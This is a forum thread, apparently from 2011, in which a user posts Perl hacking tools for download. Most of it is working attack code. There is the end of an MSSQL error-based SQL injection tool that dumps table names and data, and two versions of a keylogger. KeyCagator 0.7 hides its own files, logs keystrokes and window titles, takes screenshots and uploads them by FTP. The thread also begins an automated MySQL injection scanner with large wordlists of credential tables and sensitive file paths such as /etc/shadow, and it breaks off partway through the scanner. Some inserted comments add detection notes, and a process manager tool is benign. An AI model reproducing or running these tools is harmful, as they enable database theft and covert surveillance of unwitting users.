# built around convert(int,(select top 1 table_name from
# information_schema.tables ...)) and print each table name found in the
# response body. $pass1, $pass2, $path and $code are package globals.
#
# From the defending side: the name is recovered from the database's
# conversion-error text (the /value '(.*?)' to/ match), so returning generic
# error pages instead of raw driver errors removes the channel, and
# parameterized queries stop the appended text from reaching the statement.
# Detection: sequential GETs to one URL containing "convert(int,(" and
# "information_schema.tables", the "not in (...)" list growing by one quoted
# name per request.
sub mssql_tables {
# bypass("--") falls through to the default pair: "+" as separator, "--" as tail.
($pass1,$pass2) =  bypass("--");
# Accumulates the names already seen, as ",'name'" fragments.
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
# No error text matched: treated as the end of the list.
print "\n\n[+] Finish\n";
last;
}
}
}

# mssql_data(url, table, column): request url up to 666 times with an appended
# condition built around convert(int,(select top 1 <column> from <table> ...))
# and print each value found in the response body. The table and column names
# are pasted into the request exactly as typed. $pass1, $pass2, $path and $code
# are package globals.
#
# From the defending side: values are recovered from the database's
# conversion-error text (the /value '(.*?)' to/ match). Suppressing raw driver
# errors, using parameterized queries, and running the application under a
# database account that cannot read sensitive tables each break this on their
# own. Detection: sequential GETs to one URL containing "convert(int,(" with a
# "not in (...)" list that grows by one quoted value per request; the response
# side shows a matching run of error pages.
sub mssql_data {
# bypass("--") falls through to the default pair: "+" as separator, "--" as tail.
($pass1,$pass2) =  bypass("--");
# Accumulates the values already seen, as ",'value'" fragments.
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
# No error text matched: treated as the end of the list.
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
    # Return a (separator, terminator) pair of strings selected by the first
    # argument: "/*" and "%20" have their own pairs, anything else gets the
    # default ("+", "--").
    my %pair_for = (
        "/*"  => [ "/**/", "/*" ],
        "%20" => [ "%20",  "%00" ],
    );
    my $pair = $pair_for{ $_[0] };
    if ($pair) {
        return ($pair->[0], $pair->[1]);
    }
    return ("+", "--");
}


sub toma {
    # Issue a GET for the URL in the first argument through the shared $nave
    # client and hand back the response body, whatever the HTTP status was.
    my $response = $nave->request(GET $_[0]);
    return $response->content;
}


# ¿ The End ?



Si lo quieren descargar desde sourceforge

Código: php

https://sourceforge.net/projects/mssqltool/

#491
Perl / [Perl] Manager
Julio 03, 2011, 09:47:26 PM
Bueno , aca les traigo un programa que los ayudara a listar todos los
procesos y cerrar el que quieran
En esta version podran tener una interfaz grafica


Código: perl

#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");

&refresh;

MainLoop;


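sub refresh {
    # Repopulate the process listbox from a fresh snapshot of running
    # processes. Takes no arguments; reads the file-level $lists widget and
    # prints the process count and each name to STDOUT as it goes.

    $lists->delete(0, "end");

    # Held in $snapshot rather than $new so the file-level MainWindow stored
    # in $new is not shadowed inside this sub.
    my $snapshot = Win32::Process::List->new();
    my %process  = $snapshot->GetProcesses();

    # The original loop named the keys $pid and displayed the values, so keys
    # are presumably PIDs and values process names (confirm against the
    # installed module). Only the names are shown: entries that share a name
    # cannot be told apart in the listbox.
    my @procer = map { $process{$_} } keys %process;

    print "\n\n[+] ".int(@procer)."\n\n";
    for my $name (@procer) {
        print $name."\n";
        $lists->insert("end", $name);
    }
    return;
}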

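sub close {
    # Terminate every process currently selected in the listbox, refreshing
    # the list after each one. Takes no arguments; reads the file-level $lists.

    my $selection = $lists->curselection();

    for my $id (@$selection) {

        my $proceso = $lists->get($id);

        # The listbox holds names only, so the PID is looked up again by name.
        # When several processes share the name, the one terminated is
        # whichever the lookup returns; verify the PID elsewhere before
        # closing anything that matters.
        my $pida = Win32::Process::List->new();
        my @pid  = $pida->GetProcessPid($proceso);

        # NOTE(review): index 1 is kept from the original; confirm what
        # GetProcessPid returns in list context for the installed module.
        if (defined $pid[1]) {
            # The second argument is the exit code given to the terminated
            # process; the original passed the process name in that position.
            Win32::Process::KillProcess($pid[1], 0);
            sleep 3;
        }
        refresh();
    }
    return;
}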



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?



Si lo quieren descargar desde sourceforge

Código: php

https://sourceforge.net/projects/managerx/

#492
Perl / [Perl] Keycagator 0.7
Julio 03, 2011, 09:47:14 PM
Hola a todos, acá les traigo la nueva versión de este keylogger.
En esta versión ya es aceptable, con las siguientes opciones:

  • Captura letras reconociendo mayusculas y minusculas
  • Captura ventanas en la que se trabaja
  • Toma fotos del sistema cada 1 minuto
  • Sube logs y fotos tomadas por FTP
  • Oculta rastros

    Código: perl

    #!usr/bin/perl
    #KeyCagator 0.7 (C) Doddy Hackman 2011
    #

    use Win32::API;
    use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
    use Win32::Clipboard;
    use threads;
    use Net::FTP;
    use Win32::File;
    use Cwd;

    my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
    my $tengo = 0;

    #if ($^O eq 'MSWin32') {
    #use Win32::Console;
    #Win32::Console::Free();
    #}

    hideit($0,"hide");

    subirftp("logs.txt","logs.txt");

    my $comando1 = threads->new(\&capture_windows);
    my $comando2 = threads->new(\&capture_keys);
    my $comando3 = threads->new(\&capture_screen);

    $comando1->join();
    $comando2->join();
    $comando3->join();


    sub capture_windows {

    while(1) {

    my $win1 = GetForegroundWindow();         
    my $win2 = GetForegroundWindow();

    if($win1 != $win2){
    my $nombre = GetWindowText($win1);
    chomp($nombre);
    if ($nombre ne "") {
    #print "\n\n[".$nombre."]\n\n";
    savefile("logs.txt","\n\n[".$nombre."]\n\n");
    }
    }
    }
    return 1;
    }

    sub capture_keys {

    while(1) {

    my $test1;
    my $test2;

    for my $num(0x30..0x39) { #Numbers

    if (dame($num)) {
    #print "number : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }
    }

    if (dame(0x14)) {
    $test1 = 1;
    $tengo++;
    }

    for my $num(0x41..0x5A) { #Words

    if (dame($num)) {

    if (dame(0x20)) {
    savefile("logs.txt"," ");
    }

    if (dame(0x32)) {
    savefile("logs.txt","\n[enter]\n\n");
    }

    unless (verpar($tengo) eq 1) {
    #print "MAYUSCULA : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }

    if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
    #print "MAYUSCULA : ".chr($num)."\n";
    $test2 = 1;
    }

    unless ($test1 eq 1 or $test2 eq 1) {
    if ($num >= 0x41) {
    if ($num <= 0x5A) {
    if (verpar($tengo) eq 1) {
    #print "MINUSCULA : ".chr($num+32)."\n";
    savefile("logs.txt",chr($num+32));
    }
    }
    }
    }
    }
    }
    }
    return 1;
    }

    # capture_screen(): loop forever; once every 60 seconds send an
    # Alt+PrintScreen keystroke, read the bitmap from the clipboard, write it
    # to "<n>.bmp" in the current directory, mark that file hidden and pass it
    # to subirftp(). $numero is a package global counter starting at 1.
    #
    # Defender notes: side effects visible on the host are the clipboard being
    # overwritten with an image once a minute, a growing set of sequentially
    # numbered hidden .bmp files next to the script, and one FTP upload per
    # file. File-creation telemetry for numbered .bmp files with the hidden
    # attribute set is a practical hunting query.
    sub capture_screen {

    $numero = 0;

    while(1) {

    sleep 60;

    $numero++;

    SetForegroundWindow(1);
    SendKeys('%{PRTSCR}');

    my $a = Win32::Clipboard::GetBitmap();

    # Two-argument open on a bareword handle; the result is not checked.
    open (FOTO,">".$numero.".bmp");
    binmode(FOTO);
    print FOTO $a;
    close FOTO;

    hideit($numero.".bmp","hide");
    subirftp($numero.".bmp",$numero.".bmp");
    }
    }

    # dame(vk): call user32 GetAsyncKeyState (bound to $come at file level)
    # with the given virtual-key code and return the low bit of the result.
    #
    # Defender notes: capture_keys() calls this for every code in 0x30..0x39
    # and 0x41..0x5A, plus a few modifier codes, inside a while(1) loop that
    # never sleeps. The process therefore shows sustained CPU use and a very
    # high rate of GetAsyncKeyState calls while not owning the foreground
    # window, which is a behaviour endpoint monitoring can alert on.
    sub dame {
    return($come->Call(@_) & 1);
    }

    # savefile(path, text): append text to path, then set the hidden attribute
    # on that file through hideit().
    #
    # Defender notes: every caller in this script passes "logs.txt", so the
    # artefact is a hidden logs.txt in the script's working directory that is
    # reopened, appended to and re-hidden on each recorded event. The open is
    # the two-argument form on a bareword handle and its result is not checked.
    sub savefile {

    open (SAVE,">>".$_[0]);
    print SAVE $_[1];
    close SAVE;

    hideit($_[0],"hide");

    }

    # hideit(path, mode): set the file attributes of path to NORMAL when mode
    # is "show" or to HIDDEN when mode is "hide"; any other mode prints
    # "error". NORMAL and HIDDEN are the attribute constants from Win32::File.
    #
    # Defender notes: the hidden attribute only removes the file from default
    # Explorer and dir views. "dir /a", attrib and file-system telemetry still
    # list it, and the script's first action is to apply this to its own file
    # ($0), so a hidden script or executable in a user-writable directory is
    # worth a look.
    sub hideit {
    if ($_[1] eq "show") {
    Win32::File::SetAttributes($_[0],NORMAL);
    }
    elsif ($_[1] eq "hide") {
    Win32::File::SetAttributes($_[0],HIDDEN);
    }
    else {
    print "error\n";
    }
    }

    # subirftp(local_name, remote_name): connect to the FTP server named in
    # the source, log in, and upload <cwd>/local_name as remote_name. Returns
    # the bareword true on a successful put; otherwise falls off the end.
    # $ser is a package global.
    #
    # Defender notes: the server name ("localhost" as posted) and the account
    # and password are literals in the file, so anyone who obtains the script
    # or a compiled copy recovers them. FTP carries both the login and the
    # uploaded data unencrypted, which makes the transfers inspectable on the
    # network. Outbound FTP from a workstation process that is not a known FTP
    # client is the network-side indicator.
    sub subirftp {

    if ($ser = Net::FTP->new("localhost")) {
    if ($ser->login("doddy","123")) {
    print "subi".getcwd()."/".$_[0]."\n";
    if ($ser->put(getcwd()."/".$_[0],$_[1])) {
    # Returns before the close below is reached.
    return true;
    }
    }
    $ser->close;
    }


    }

    sub verpar{
        # Parity helper: gives "1" when the argument is even and "2" when it
        # is odd.
        my $remainder = $_[0] % 2;
        if ($remainder) {
            return "2";
        }
        return "1";
    }


    #Credits : to explorer for helpme with the function verpar()
    #Mail : lepuke[at]hotmail[com]
    #Blog : doddy-hackman.blogspot.com
    # ¿ The End ?
#493
Perl / [Perl] KeyCagator 0.4
Julio 03, 2011, 09:46:58 PM
Bueno , este es un keylogger en perl que hice con las siguientes opciones

* Captura teclas reconociendo mayusculas y minusculas
* Muestra ventanas en las que se esta trabajando

Pocas opciones, pero mejor que la versión anterior

Código: perl

#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow();

if($win1 != $win2){
my $nombre = GetWindowText($win1);
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}

sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) { #Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
}
}
}

}

# dame(vk): call user32 GetAsyncKeyState (bound to $come at file level) with
# the given virtual-key code and return the low bit of the result.
#
# Defender notes: the main loop of this script runs without any sleep and
# reaches this sub for every code in 0x30..0x39 and 0x41..0x5A on each pass,
# so the process shows sustained CPU use and a very high rate of
# GetAsyncKeyState calls, which endpoint monitoring can alert on.
sub dame {
return($come->Call(@_) & 1);
}

# savefile(path, text): append text to path.
#
# Defender notes: every caller in this script passes "logs.txt", so the
# artefact is a logs.txt file in the working directory that grows with window
# titles in square brackets and typed characters. The open is the two-argument
# form on a bareword handle and its result is not checked.
sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}

sub verpar{
    # Parity helper: gives "1" when the argument is even and "2" when it is
    # odd.
    my $remainder = $_[0] % 2;
    if ($remainder) {
        return "2";
    }
    return "1";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?


Si lo quieren descargar desde sourceforge

Código: php

https://sourceforge.net/projects/keycagator/
#494
Perl / [Perl] K0bra 0.5
Julio 03, 2011, 09:46:20 PM
Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código: perl

#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#

system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','a
dmin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','us
er_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images',
'index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup
','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt
/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/ph
